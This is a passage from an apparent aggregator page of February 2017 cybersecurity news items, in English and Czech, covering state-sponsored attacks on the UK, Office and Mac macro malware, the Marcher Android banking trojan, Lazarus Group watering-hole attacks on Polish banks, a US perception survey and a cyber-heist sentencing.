Finally, the Business-Driven Security architecture is operationalized via the new RSA Risk & Cybersecurity Practice. The practice aims to reduce business risk through risk management, identity assurance, incident response, and advanced cyber defense.
“Despite best efforts, today’s security approaches are in dire need of transformation because they fall short when they are put into action. This forces organizations into a downward cycle of investment and re-investment,” said Rohit Ghai, President, RSA. “RSA is proud to provide a new architecture and array of Business-Driven Security solutions that are engineered to enable the most critical elements of a sound security strategy: linking business context with security incidents to more strategically address and manage business risk to protect what matters most.”
National Cyber Security Centre – UK hit by dozens of major cyber attacks each month
13.2.2017 securityaffairs Cyber
Britain’s security has been threatened by 188 major cyber attacks in the last three months, according to the head of the National Cyber Security Centre.
According to the head of the National Cyber Security Centre (NCSC), the UK government suffered at least 188 major cyber attacks in the past three months.
Ciaran Martin, former GCHQ cybersecurity chief, told The Sunday Times that the attacks are mostly from China and Russia.
The attacks threatened national security, nation-state actors conducted cyber espionage campaigns aimed to “extract information on UK government policy on anything from energy to diplomacy to information on a particular sector.”
“Britain is being hit by 60 significant cyber-attacks a month, including attempts by Russian state-sponsored hackers to steal defence and foreign policy secrets from government departments, the new cyber-security chief has revealed.” reported the told The Sunday Times
“In his first key interview, Ciaran Martin, head of GCHQ’s new National Cyber Security Centre (NCSC), warned there had been a “step change” in Russia’s online aggression against the West as well as more attacks on “soft targets” such as local councils and charities to steal personal data, and universities to steal research secrets.”
National Cyber Security Centre
Martin confirmed that the UK suffered state-sponsored attacks similar to those that targeted the Democratic National Committee in the 2016 Presidential Election.
UK authorities highlighted “a step-change in Russian aggression in cyber space” across the years.
“Part of that step change has been a series of attacks on political institutions, political parties, parliamentary organizations and that’s all very well evidenced by our international partners and widely accepted,” he said.
The National Cyber Security Centre had blocked 34,550 “potential attacks” on UK entities over the past six months.
“Meanwhile, Chancellor Phillip Hammond – a former defence and foreign secretary – said the NCSC had blocked 34,550 “potential attacks” on government departments and members of the public in the last six months – a rate of about 200 a day.” reported the BBC.
Office Loader Uses Macros to Drop Array of Malware
13.2.2017 securityweek Virus
A recently discovered Microsoft Office loader uses malicious macros to drop multiple malware families, Palo Alto Networks security researchers warn.
More than 650 unique samples of this loader have been observed since initial detection in early December 2016, accounting for 12,000 malicious sessions targeting numerous industries. The loader, researchers say, is being delivered via email and employs heavily obfuscated malicious macros and a user account control (UAC) bypass technique to compromise targeted systems.
The roughly 12,000 phishing email runs distributing the loader used a variety of subject lines, claiming to be purchase orders, requests for quotation, purchase enquiries, and email verification notifications, among others. The attached malicious documents were masquerading as invoices, product lists, deposit slips, or document scans, and more.
High Tech, Professional and Legal Services, and Government were some of the most affected industries, Palo Alto Networks says. However, the distribution campaigns leveraging this loader have been targeting other sectors as well, including Wholesale, Telecoms, and Services.
Some of the malware families dropped using this loader included LuminosityLink, KeyBase, PredatorPain, Ancalog, Bartalex, Pony, and DarkComet.
“Based on the large amount of commodity malware families being dropped, as well as the wide distribution seen, this loader appears to primarily be used for widespread campaigns,” the security researchers say.
The loader uses malicious macros that have been obfuscated using a large amount of garbage code and randomly chosen variables, which led researchers to believe that a builder was used to generate them. The second part of the malicious macro, researchers say, includes not only garbage code, but also obfuscated strings and a number of strings written to the Word document and which are in-line with the ploy used by the attacker, based on the subject line and filename.
The first half of the macro, on the other hand, includes a function to decode the obfuscated strings, after which they are called with a PowerShell command. To decode the strings, the macro simply removes characters present within a blacklist string. However, researchers say that only about half of the samples contained decoy information.
One of the decoded functions was meant to download a payload via PowerShell and then drop it within the %TEMP% directory. The macro would also create a registry key to point to the dropped file, while also abusing Windows Event Viewer to bypass UAC and elevate its privileges. The dropped file is then removed.
The UAC bypass was first detailed in August 2016, and was recently used in various campaigns, including some focused on the distribution of ransomware.
A small set of samples used the built-in BITSAdmin tool instead of PowerShell to download the malware. The technique was associated with 11 samples that were spotted in early December, when the loader first appeared. However, the attackers switched to PowerShell.
“Overall, this new loader is interesting in its use of performing a UAC bypass. Additionally, the widespread use of this loader since December of last year shows that it is being used in numerous campaigns. It is unclear if this loader is being used by one or more groups. Multiple industries have been targeted by this loader, which has been used to deploy multiple malware families,” Palo Alto researchers conclude.
Survey Examines Cybersecurity Perception in U.S.
13.2.2017 securityweek Cyber
Survey Highlights Widely Divergent Views on State of Cyber Security in America
A new survey of American adults' perceptions of cybersecurity and hackers shows both a generational and a gender divide in attitudes. Young adults often display a more pragmatic approach compared to a more hardline attitude from older Americans, while there is a frequent difference between the genders.
5000 American adults aged 16+ responded to an online survey conducted by Opinion Matters for HackerOne and Kaspersky Lab during December 2016. The purpose was to get insight into consumers' perception of the hacker mindset and motivation without specifically differentiating between blackhat hackers and whitehat researchers.
The generational divide is clearly shown in the respondents' attitude towards hacker motivation. Fifty-two percent of respondents aged 45-55+ believe that hacker motivation is to be malicious, and 59% believe the motivation is to create problems. Only 35% of those aged 16-24 think hackers hack with malicious intentions.
However, far fewer Americans believe in 'good intentions': 15% believe hackers hack to report vulnerabilities, and only 14% believe they are motivated by 'good feeling' in helping companies and government understand security weaknesses.
Knowledge of bug bounty and pentesting operations seems to make little difference to Americans' buying behavior. Only 22% say they are more likely to make a purchase from companies that use these to protect their services, while 54% say it will make no difference.
Of particular interest is the response to a question about current politics: "Do you think North America will be more vulnerable to cyber-espionage or nation-sponsored cyberattacks with Donald Trump as President of the United States?" Only 28% believed in December 2016 that Trump policies will definitely make the US more vulnerable. Sixteen percent thought it possible, but 56% didn't "think the risk will be any higher than before."
This seems to be in sharp contrast to current thinking from the government agencies tasked with protecting the US. The Observer yesterday published an article headlined "Intelligence Community pushes back against a White House it considers leaky, untruthful and penetrated by the Kremlin." Written by John Schindler, a former National Security Agency analyst and counterintelligence officer, it claims, "Our Intelligence Community is so worried by the unprecedented problems of the Trump administration... that it is beginning to withhold intelligence from a White House which our spies do not trust."
Of particular concern is a series of December telephone conversations between national security adviser Michael Flynn and the Russian embassy in Washington which would have been automatically monitored by US SIGINT (discussed in detail in The Washington Post on Thursday last week).
The implication is that the American people had greater trust in Trump's national security in December 2016 than the US intelligence community has in February 2017.
The survey (PDF) question also highlights both the generational and gender differences among American attitudes. Men are less concerned than women (60% vs 52%) about the state of cybersecurity under the new administration, while millennials (aged 16-24) "were the most likely to think that North America would be more vulnerable to cyber espionage or nation-sponsored cyberattacks with Donald Trump as president (56%)."
Particularly concerning, however, is that the majority of consumers do not trust their own employers. "Only 36% of U.S. adults," says the report, "said that they would choose to be a customer of their own employer knowing what they know about their company’s cybersecurity program and ability to protect customers from cyber criminals."
"This study," concludes Ryan Naraine, head of the U.S. Global Research and Analysis Team at Kaspersky Lab, "helps to highlight the ongoing confusion among Americans, both at home and while at work, regarding cybersecurity. Cybersecurity is everyone's responsibility, and it's imperative that the security community, businesses and governments routinely work together to educate Americans on cyber threats. We need to ensure that consumers and organizations are not only educated on the risks, but also know the best solutions for safeguarding sensitive data from cybercriminals."
Thousands of Android Devices Infected by Marcher Trojan
13.2.2017 securityweek Android
Researchers at Dutch security firm Securify have conducted a detailed analysis of the Android banking Trojan known as Marcher and discovered that a single botnet has managed to steal a significant number of payment cards.
Marcher has been around since late 2013, but it initially attempted to trick users into handing over their payment card details using Google Play phishing pages. In March 2014, the malware started targeting banks in Germany and, by the summer of 2016, there had already been more than 60 targeted organizations in the U.S., U.K., Australia, France, Poland, Turkey, Spain and other countries.
The malware has been disguised as various popular apps, including Netflix, WhatsApp and Super Mario Run.
Securify has identified nine Marcher botnets over the last 6 months, and each of them has been provided with new modules and targeted web injects by the Trojan’s creators.
One of these botnets, which mainly targets the customers of banks in Germany, Austria and France, has infected more than 11,000 devices, including 5.700 in Germany and 2,200 in France. The attackers’ C&C server stored 1,300 payment card numbers and other banking information.
Based on the analysis of the command and control (C&C) server used by the cybercriminals, researchers determined that a majority of the infected devices had been running Android 6.0.1, but the list of victims also included more than 100 Android 7.0 devices.
Marcher monitors the applications launched by the victim, and when one of the targeted apps is detected, an overlay screen is displayed in an effort to trick the user into handing over sensitive information.
“Marcher is one of the few Android banking Trojans to use the AndroidProcesses library, which enables the application to obtain the name of the Android package that is currently running in the foreground. This library is used because it uses the only (publicly known) way to retrieve this information on Android 6 (using the process OOM score read from the /proc directory),” Securify researchers explained.
In order to avoid being removed by security products, Marcher blocks popular mobile antivirus applications. Seven months ago, researchers said the Trojan had been blocking eight antiviruses, but Securify’s report shows that the malware currently targets nearly two dozen products.
“Based on the statistics we found on this one C2 panel we researched and the amount of different C2 panels out there, we believe that the potential financial losses due to Android banking Trojans are, or will soon be, bigger than the current losses from desktop malware like Gozi and Dridex, especially since hardly any of the banking apps seem to detect the attack,” experts said.
Microsoft Unveils New Security and Risk Capabilities in Office 365
13.2.2017 securityweek Security
Microsoft has unveiled several new capabilities in Office 365 to help customers better manage risks and protect against threats, including Office 365 Secure Score, Threat Intelligence Private Preview, and Advanced Data Governance Preview.
Office 365 Secure Score was designed as a security analytics tool that applies a score to the customers’ Office 365 security configuration. Secure Score, says Alym Rayani, director for Microsoft's Office Security and Compliance team, was created to provide customers with improved visibility into their Office 365 security configuration and into the security features available to them.
With the help of this new tool, customers will not only be able to understand their current Office 365 security configuration, but also to learn how implementing additional controls can improve their security and reduce risk, Rayani says.
Secure Score provides access to Score Analyzer via the Secure Score Summary. The Secure Score (or the numerator) is the sum of the points associated with the security configurations that a customer has adopted. The total score (or the denominator) is the sum of the points associated with all of the security controls available on the customer’s Office 365 plan.
The Score Analyzer allows customers to track and report their score over time. Customers are provided with access to a graph that shows their score on any date in the past, while also offering info on the specific actions they completed and which were available to them. The tool also offers support for exporting the score results to a CSV file for further use within an organization.
Secure Score also offers suggestions on possible actions that could improve one’s security position. These suggestions, Microsoft says, are prioritized depending on their effectiveness and impact to end users, meaning that those that are highly effective but have low impact on user experience are placed at the top.
The Office 365 Threat Intelligence, now in private preview, leverages the Microsoft Intelligent Security Graph to deliver actionable insights to global attack trends. The cost of data breaches is increasing, but even organizations that are properly prepared for a breach can diminish long-term costs.
The new Office 365 feature, Microsoft says, was designed to analyze data from global datacenters, Office clients, email, user authentications and other incidents and to deliver information about malware families inside and outside organizations, including breach information. Furthermore, it integrates with other Office 365 security features, including Exchange Online Protection and Advanced Threat Protection.
“Office 365 Threat Intelligence provides this visibility, along with rich insights and recommendations on mitigating cyber-threats, ultimately supporting a proactive defense posture, leading to long-term reduced organizational costs,” Rayani notes.
With the help of Office 365 Advanced Data Governance, customers can find and retain important data while eliminating redundant, obsolete and trivial data. By leveraging machine learning, it can deliver proactive policy recommendations; can classify data based by analyzing numerous factors, including data type, age, and user interaction; and can take action such as preservation or deletion.
According to Microsoft, this means that organizations have a better grasp of their data and no longer expose themselves to unnecessary risks because they retain data they no longer need, but which could be exposed in the event of a data breach.
While Office 365 Secure Score is now available to organizations with an Office 365 commercial subscription and which are in the multi-tenant and Office 365 U.S. Government Community clouds, Office 365 Threat Intelligence and Advanced Data Governance should become available by the end of March 2017 as part of the Office 365 Enterprise E5 plan and the Secure Productive Enterprise E5 offering.
DHS Uses Cyber Kill Chain to Analyze Russia-Linked Election Hacks
13.2.2017 securityweek Cyber
DHS Publishes Enhanced Analysis Report on GRIZZLY STEPPE Activity
The Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) on Friday published a new report providing additional indicators of compromise (IOC) and analysis using the cyber kill chain to detect and mitigate threats from the Russia-linked "GRIZZLY STEPPE" hackers.
On Dec. 29, 2016, the DHS and FBI published an initial Joint Analysis Report (JAR) detailing the tools and infrastructure used by Russian hackers designated by DHS as “GRIZZLY STEPPE” in attacks against the United States election. The previous report, however, didn’t deliver on its promise, security experts argued.
While the original report included a series of IOCs, some said that they were of low quality, had limited utility to defenders, and were published as a political tool attempting to connect the attacks to Russia.
The new report is described by DHS as an Analytical Report (AR) providing a “thorough analysis of the methods threat actors use to infiltrate systems” in relation to the GRIZZLY STEPPE hackers. The report provides additional details on IOCs, along with analysis along phases of the cyber kill chain, and suggests specific mitigation techniques that could be used to counter GRIZZLY STEPPE attackers.
Utilizing the Cyber Kill Chain to Analyze GRIZZLY STEPPE
DHS analysts leveraged the Cyber Kill Chain framework created by Lockheed Martin that describes the phases of an attack. The report summarizes the activity of the campaign using each phase of the Cyber Kill Chain, which are Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, and Actions on the Objective.
The report also provides detailed host and network signatures to help defenders detect and mitigate GRIZZLY STEPPE related activity, including additional YARA rules and IOCs associated with the attacks.
The DHS has previously said that two different actors participated in the political attacks, one in the summer of 2015, namely APT29, and the other in spring 2016, namely APT28. The former is also known as Cozy Bear, or CozyDuke, while the latter is referred to as Fancy Bear, Pawn Storm, Strontium, Sofacy, Sednit and Tsar Team.
DHS recommends that security teams read multiple bodies of work from various sources concerning GRIZZLY STEPPE.
“While DHS does not endorse any particular company or their findings, we believe the breadth of literature created by multiple sources enhances the overall understanding of the threat. DHS encourages analysts to review these resources to determine the level of threat posed to their local network environments,” the agency said.
Watering hole attacks on Polish Banks Linked to Lazarus Group
13.2.2017 securityweek Crime
According to security experts from Symantec and BAE Systems, the recently discovered attacks aimed at Poland banks are linked to the Lazarus Group.
Last week, several Polish banks confirmed their systems were infected with a malware after their staff visited the site of the Polish Financial Supervision Authority.
The cyber attack was first reported by the Zaufana Trzecia Strona, a local Polish news site on Friday, last week.
The interesting aspect of the attack is that crooks used the Polish financial regulator, the Polish Financial Supervision Authority (KNF), to spread the malware.
A spokesman for the KNF confirmed that internal systems of the regulator had been compromised by hackers “from another country”. The attackers dropped on the servers the malicious files that were used in the attacks against the Polish banks.
In order to avoid spreading the malware, the authorities took the decision to shut down the entire network at the KNF “in order to secure evidence.”
Lazarus Group Polish banks malware
The malware-based attack was confirmed by a number of banks that are currently investigating the security breach.
At the time I was writing there is no evidence that attackers successfully stolen money from Polish banks or their customers, but some of the target organizations confirmed to have noticed large outgoing data transfers.
Both security firms BAE Systems and Symantec started their investigation on the attacks. According to Symantec, the threat actor behind the attack is the same that targeted financial organizations in 31 countries since at least October 2016.
According to Symantec, the Polish website used to target the Polish banks delivered a strain of malware known to be part of the toolkit of the Lazarus Group.
The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.
This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.
The experts at Symantec have spotted in the past at least three strains of malware used by the group, Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee, which have been used in targeted attacks against financial institutions.
The attackers exploited “watering holes” in order to infect the machines of a specific audience with previously unknown malware.
“Symantec has blocked attempts to infect customers in Poland, Mexico and Uruguay by the same exploit kit that infected the Polish banks. Since October, 14 attacks against computers in Mexico were blocked, 11 against computers in Uruguay, and two against computers in Poland.” reads the analysis published by Symantec.
Malware researchers at Symantec have identified roughly 150 targeted IPs associated with more than 100 organizations across 31 countries. The attackers focused their activities on the banks, but the list of victims also includes ISPs and telecom operators.
“The attackers appear to be using compromised websites to redirect visitors to a customized exploit kit, which is preconfigured to only infect visitors from approximately 150 different IP addresses. These IP addresses belong to 104 different organizations located in 31 different countries. The vast majority of these organizations are banks, with a small number of telecoms and internet firms also on the list.” continues Symantec.”
Experts at Kaspersky have linked the group to the hacking operations Dark Seoul and Operation Troy. Kaspersky Lab, alongside with a number of security firms including Novetta, AlienVault, Invincea, ThreatConnect, Volexity, Symantec, and PunchCyber have published reports related to the activities of the Lazarus Group.
The group of security firms formed an alliance called Operation Blockbuster that issued the detection signatures to neutralize the hacking tools used by the APT.
In June 2016, the analysis of SWIFT attacks revealed five additional pieces of malware containing portions of code shared by Lazarus Group.
According to the analysis published by BAE Systems, one of the domains used in the Poland attack was also involved in a watering hole attack targeting the National Banking and Stock Commission of Mexico (cnbv.gob.mx), the Mexican organization that is equivalent of Poland KNF.
“The eye-watch[.]in domain appears to have been used in watering-hole attacks on other financial sector websites. On 2016-11-08 we observed connections to the site referred from:
hxxp://www.cnbv.gob[.]mx/Prensa/Paginas/Sanciones.aspx
This is the page for the Comisión Nacional Bancaria y de Valores (National Banking and Stock Commission of Mexico), specifically the portion of their site that details sanctions made by the Mexican National Banking Commission. This organisation is the Mexican banking supervisor and the equivalent of Poland’s KNF.” reads the analysis published by BAE Systems.
Below the key findings of the analysis conducted by BAE Systems:
There has been a series of watering hole attacks on bank supervisor websites in Poland & Mexico, and a state owned bank in Uruguay in recent months. These leverage Silverlight and Flash exploits to deliver malware.
Investigators in Poland have identified known Lazarus group implants on bank networks and associated this with the recent compromise of the Polish Financial Supervision Authority’s website.
The technical/forensic evidence to link the Lazarus group actors (who we believe are behind the Bangladesh Bank attack and many others in 2016) to the watering-hole activity is unclear. However, the choice of bank supervisor / state-bank websites would be apt, given their previous targeting of Central Banks for Heists – even when it serves little operational benefit for infiltrating the wider banking sector.
Give a look at both reports, they are full of information and also includes IoCs.
Survey Examines Cybersecurity Perception in U.S.
13.2.2017 securityaffairs Cyber
Survey Highlights Widely Divergent Views on State of Cyber Security in America
A new survey of American adults' perceptions of cybersecurity and hackers shows both a generational and a gender divide in attitudes. Young adults often display a more pragmatic approach compared to a more hardline attitude from older Americans, while there is a frequent difference between the genders.
5000 American adults aged 16+ responded to an online survey conducted by Opinion Matters for HackerOne and Kaspersky Lab during December 2016. The purpose was to get insight into consumers' perception of the hacker mindset and motivation without specifically differentiating between blackhat hackers and whitehat researchers.
The generational divide is clearly shown in the respondents' attitude towards hacker motivation. Fifty-two percent of respondents aged 45-55+ believe that hacker motivation is to be malicious, and 59% believe the motivation is to create problems. Only 35% of those aged 16-24 think hackers hack with malicious intentions.
However, far fewer Americans believe in 'good intentions': 15% believe hackers hack to report vulnerabilities, and only 14% believe they are motivated by 'good feeling' in helping companies and government understand security weaknesses.
Knowledge of bug bounty and pentesting operations seems to make little difference to Americans' buying behavior. Only 22% say they are more likely to make a purchase from companies that use these to protect their services, while 54% say it will make no difference.
Of particular interest is the response to a question about current politics: "Do you think North America will be more vulnerable to cyber-espionage or nation-sponsored cyberattacks with Donald Trump as President of the United States?" Only 28% believed in December 2016 that Trump policies will definitely make the US more vulnerable. Sixteen percent thought it possible, but 56% didn't "think the risk will be any higher than before."
This seems to be in sharp contrast to current thinking from the government agencies tasked with protecting the US. The Observer yesterday published an article headlined "Intelligence Community pushes back against a White House it considers leaky, untruthful and penetrated by the Kremlin." Written by John Schindler, a former National Security Agency analyst and counterintelligence officer, it claims, "Our Intelligence Community is so worried by the unprecedented problems of the Trump administration... that it is beginning to withhold intelligence from a White House which our spies do not trust."
Of particular concern is a series of December telephone conversations between national security adviser Michael Flynn and the Russian embassy in Washington which would have been automatically monitored by US SIGINT (discussed in detail in The Washington Post on Thursday last week).
The implication is that the American people had greater trust in Trump's national security in December 2016 than the US intelligence community has in February 2017.
The survey (PDF) question also highlights both the generational and gender differences among American attitudes. Men are less concerned than women (60% vs 52%) about the state of cybersecurity under the new administration, while millennials (aged 16-24) "were the most likely to think that North America would be more vulnerable to cyber espionage or nation-sponsored cyberattacks with Donald Trump as president (56%)."
Particularly concerning, however, is that the majority of consumers do not trust their own employers. "Only 36% of U.S. adults," says the report, "said that they would choose to be a customer of their own employer knowing what they know about their company’s cybersecurity program and ability to protect customers from cyber criminals."
"This study," concludes Ryan Naraine, head of the U.S. Global Research and Analysis Team at Kaspersky Lab, "helps to highlight the ongoing confusion among Americans, both at home and while at work, regarding cybersecurity. Cybersecurity is everyone's responsibility, and it's imperative that the security community, businesses and governments routinely work together to educate Americans on cyber threats. We need to ensure that consumers and organizations are not only educated on the risks, but also know the best solutions for safeguarding sensitive data from cybercriminals."
Malware Attacks on Polish Banks Linked to Lazarus Group
13.2.2017 securityweek Virus
Poland Bank Attacks Part of Bigger Campaign Targeting Over 100 Organizations
The recently discovered attacks aimed at banks in Poland appear to be part of a bigger campaign targeting financial organizations around the world, and researchers have found some links to the threat actor known as Lazarus.
BadCyber reported earlier this month that the systems of several Polish banks had been infected with a new piece of malware. The attackers hijacked the website of the Polish Financial Supervision Authority (knf.gov.pl) and abused it to deliver malware to its visitors.
While there is no evidence that money has been stolen from banks or their customers, some of the organizations whose systems have been infected have noticed large outgoing data transfers.
Researchers at Symantec and BAE Systems have also analyzed the attack and determined that the custom exploit kit used by the attackers was configured to infect only visitors with certain IP addresses.
Symantec has identified roughly 150 targeted IPs associated with more than 100 organizations across 31 countries. Most of the targeted organizations are banks, but the list of targets also includes telecoms and Internet companies. The IP addresses have been linked to banks in Poland, the U.S., Mexico, Brazil, Chile, Denmark, Venezuela, Colombia, the U.K., Peru and India.
The custom exploit kit was used to target Symantec customers in Poland, Mexico and Uruguay in attacks first spotted in October 2016.
The Polish website used as a watering hole delivered a piece of malware known to be part of the toolkit of the Lazarus Group. This threat actor, analyzed last year by several security firms, has been active since at least 2009 – possibly as early as 2007 – and it has conducted not only cyber espionage operations, but also attacks whose goal was to destroy data and disrupt systems.
Several high profile attacks have been attributed to the Lazarus Group, including the 2014 attack on Sony, and the Dark Seoul and Operation Troy campaigns. The actor has targeted government, military, media, aerospace, financial and manufacturing organizations primarily in South Korea and the United States.
Researchers also discovered links between Lazarus and an attack on a bank in the Philippines believed to have been carried out by the same cybercriminals that stole $81 million from Bangladesh’s Central Bank.
BAE Systems discovered that one of the domains used in the recent Poland watering hole attack was also involved in a similar attack targeting the National Banking and Stock Commission of Mexico (cnbv.gob.mx), which is the Mexican equivalent of Poland’s KNF. The firm has also found evidence suggesting that the website of a state-owned bank in Uruguay had been targeted in a similar attack.
“The technical/forensic evidence to link the Lazarus group actors (who we believe are behind the Bangladesh Bank attack and many others in 2016) to the watering-hole activity is unclear,” BAE Systems researchers said in a blog post. “However, the choice of bank supervisor / state-bank websites would be apt, given their previous targeting of Central Banks for Heists – even when it serves little operational benefit for infiltrating the wider banking sector.”
Word documents laced with malicious macros used to hack Apple Mac systems
13.2.2017 securityaffairs Apple
Crooks exploiting Word documents laced with malicious macros to compromise Apple Mac systems exactly in the same way they do with Microsoft machines.
It’s amazing the number of Apple Mac users that tell me their systems are immune from malware. This false sense of security is very dangerous and I believe it is important to explain how also Mac system could be compromised by malicious codes.
I want to take advantage by telling you about a recent event to explore the topic, crooks exploiting Word documents laced with malicious macros to compromise Apple Mac systems exactly in the same way they do with Microsoft machines.
Last week, security experts observed a spike in the distribution spam messages using attachments embedding malicious macros. One of the baits was titled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm,” when the Mac recipients open the documents are prompted to enable macros.
Apple MAC
If a Mac user enabled the macros, the file executes a Python function that downloads a malicious payload and executes it infecting the machine. The Python code is publicly available, it is part of the open-source project EmPyre, and as highlighted by the researcher Patrick Wardle, this new attack leverages old tricks.
“Today, Monday the 6th, was a busy day for macOS malware! First, Nex (@botherder) posted a great writeup, iKittens: Iranian actor resurfaces with malware for mac (macdownloader)“, which detailed some new macOS malware. Shortly thereafter, my friend Scott (@0xdabbad00) brought to my attention the following tweet:
Segui
Snorre Fagerland @fstenv
#OSX #Macro #EmPyre "U.S. Allies and Rivals Digest Trump’s Victory - Carnegie Endowment for International Peace" https://www.virustotal.com/en/file/07adb8253ccc6fee20940de04c1bf4a54a4455525b2ac33f9c95713a8a102f3d/analysis/ …
11:34 - 6 Feb 2017
9 9 Retweet 16 16 Mi piace
A malicious Word document targeting Mac users? I was intrigued :). I grabbed the sample (“U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm”), noting that only 4 AV engines currently flagged it as malicious”
The analysis of the attack revealed that the IP address used by crooks to spread the malware is located in Russia and was not new to researchers monitoring phishing campaigns.
The security researcher Patrick Wardle explained that the this Apple Mac Malware is not sophisticated, the attack needs the user interaction to compromise the machine.
The reliance on macros rather than a software vulnerability implies that the exploit can’t be blocked only by patching systems.
“Overall this malware sample isn’t particularly advanced. It relies on user interaction (to open a malicious document in Microsoft Word, (not Apple’s Pages)), as well as needs macros to be enabled. Most users know never to allow macros – right!?! Moreover using an open-source implant likely ensures that detection software should detect it – right!?” concluded Wardle.
“However let’s be nice and give the attackers some credit. By using a macros in Word document they are exploiting the weakest link; humans! And moreover since macros are ‘legitimate’ functionality (vs. say a memory corruption vulnerability) the malware’s infection vector doesn’t have to worry about crashing the system nor being ‘patched’ out. “
Recently the security researchers Claudio Guarnieri and Collin Anderson have analyzed samples of the MacDownloader malware that was disguised by nation-state hackers as a Flash Player update and a Bitdefender adware removal tool.
According to the researchers, the malware was first “poorly” developed the end of 2016, the experts noticed its code was copied from other sources. Anyway, at the time of writing the analysis, MacDownload is undetected by virus scanning engines on VirusTotal, while at the time I was writing just a dozen vendors have recognized the bogus Flash Player and Bitdefender apps as a threat.
This last case demonstrates that Apple MAC threat landscape is very active, for this reason, it is important awareness and a proper security posture for MAC users.
Při výběru EET by se měla zvážit i úroveň zabezpečení
13.2.2017 SecurityWorld Zabezpečení
Hackerské útoky na nezabezpečené systémy elektronické evidence tržeb (EET), ztráta nebo zneužití dat a z nich plynoucí penalizace a trestní stíhání - to jsou největší rizika nepromyšleného výběru řešení EET, jak je formulovala společnost eet1, jeden z tuzemských prodejců systémů EET.
Rizika jsou podle eet1 výrazně vyšší, než před jakými varovala nedávno Hospodářská komora (HK). Podle té hrozí řadě podnikatelů kvůli rychlému napojení na EET pokuty a bezpečnostní rizika, především sankce kvůli neplatným účtenkám podle zákona o účetnictví či za chybějící zákaznické displeje. HK též varovala před rizikem hackerského útoku na kasy a ztráty citlivých obchodních informací.
Jen necelé tři týdny zbývají do spuštění druhé vlny zavádění EET, která se týká maloobchodu a velkoobchodu. Přitom většina podnikatelů a firem stále neřeší, že od 1. prosince 2016 začal platit novelizovaný zákon o trestní odpovědnosti právnických osob (ZTOPO), podle kterého hrozí za porušení povinností ochrany osobních údajů milionové sankce a trestní stíhání.
Dále, od května 2018, navíc začne platit Obecné nařízení o ochraně osobních údajů (General Data Protection Regulation, GDPR), které tyto sankce zásadně zpřísňuje až na 20 milionů eur (nebo 4 % celkového celosvětového ročního obratu příslušné společnosti za předchozí účetní období).
„Tyto hrozby se týkají každého, kdo ochranu dat a osobních údajů podcení. Neznalostí zabezpečení kupovaného EET systému se podnikatelé vystavují neúměrnému riziku trestního stíhání,“ vysvětluje Klaus Hornitschek z eet1.
Uživatel podle něj nese plnou zodpovědnost za to, že ochrání data i jejich vkládání do systému nebo používaného zařízení před zneužitím.
„Je to podobné jako u platební karty, kdy si musí chránit PIN, měl by kartu používat s určitou opatrností a samozřejmě by měl pravidelně sledovat proběhlé transakce, zda mezi nimi není nějaká podvodná nebo podezřelá,“ dodává Jiří Berger, bezpečnostní expert eet1.
Turkish Man Sent to Prison in U.S. for $55M Cyber Heist
13.2.2017 securityaffairs Cyber
Turkish citizen Ercan Findikoglu, aged 35, was sentenced on Friday by a New York court to 8 years in prison for his leadership role in a cybercriminal organization that caused significant losses to banks worldwide.
Findikoglu, known online as “Segate,” “Predator” and “Oreon,” pleaded guilty in March to computer intrusion conspiracy, access device fraud conspiracy, and effecting transactions with unauthorized access devices. He faced nearly 58 years in prison.
According to authorities, between 2011 and 2013, the criminal gang Findikoglu was part of carried out three major campaigns that resulted in losses totaling more than $55 million.
The cybercrooks hacked into the systems of payment card processing companies, stole card data, including PINs, and eliminated withdrawal limits for those cards. The stolen card data was sent to other members of the group who encoded it onto the magnetic stripe of blank cards. The cards and their PINs were then distributed to a network of cashers who made thousands of fraudulent withdrawals at ATMs around the world.
In the first operation, which took place in February 2011, the fraudsters made 15,000 withdrawals in 18 countries, stealing roughly $10 million. In the next operation, in December 2012, they managed to steal approximately $5 million through 5,000 ATM transactions conducted in 20 countries.
The third and largest operation took place in February 2013, when the fraudsters withdrew roughly $40 million through 36,000 ATM transactions in 24 countries. Cashers in New York alone managed to obtain $2.4 million as a result of nearly 3,000 withdrawals.
Findikoglu was arrested in Germany in 2013 and extradited to the U.S. in 2015. Once he completes his prison sentence in the United States, he will be sent back to Turkey, where he has been sentenced to nearly 20 years in prison for payment card fraud.
The U.S. court that sentenced Findikoglu on Friday also ordered him to pay more than $55 million in restitution, but the New York Daily News reported that Turkish authorities seized all his assets and his current net worth is $150,000.
When they announced Findikoglu’s guilty plea back in March, U.S. authorities said they had already convicted dozens of other members of the cybercrime gang.
Apple uchovával smazaná data z iCloudu
13.2.2017 SecurityWorld Apple
Společnost Elcomsoft si všimla, že Apple ukládá historii vyhledávání, kterou už uživatelé smazali. Jak závažný může být pro uživatele tento problém? Zdá se, že iCloud od Applu uchovává i více než rok starou internetovou historii vyhledávání, kterou už uživatelé dávno smazali. Na možnou kauzu upozornila ruská společnost Elcomsoft, která z iCloudových účtů dokázala vytáhnout údajně smazanou historii vyhledávání skrz prohlížeč Safari, včetně dat a časů, kdy uživatelé konkrétní stránky navštívili a kdy následně záznamy smazali.
„Byli jsme schopni dostat se k záznamům, které byly víc jak rok staré,“ uvádí Vladimir Katalov, šéf Elcomsoftu.
Uživatelé iCloudu si mohou uchovávání historie nastavit tak, aby ji měli přístupnou ze všech svých zařízení. Rusové však zjistili, že i když ji uživatel vymaže, iCloud ji zcela neodstraní, ale místo toho ji dál uchovává ve formátu, který už ale uživatel nevidí.
Uchovávání kopie takových záznamů může být podle Katalova „neocenitelné pro výzvědné a vyšetřovací služby“, nicméně dodává, že není zcela jasné, zda Apple o tom, že iCloud smazaná data uchovává, vůbec věděl.
Jakmile totiž Elcomsoft na záležitost upozornil, Apple začal z iCloudu dotčené záznamy odstraňovat, aniž by se však k objevu jakkoliv vyjádřil. „Ale možná je jen přesouvají na jiné servery, aby se k nim už zvenku nešlo dostat,“ dodává Katalov, podle něhož už se jeho lidé dostali pouze k záznamům starým dva týdny.
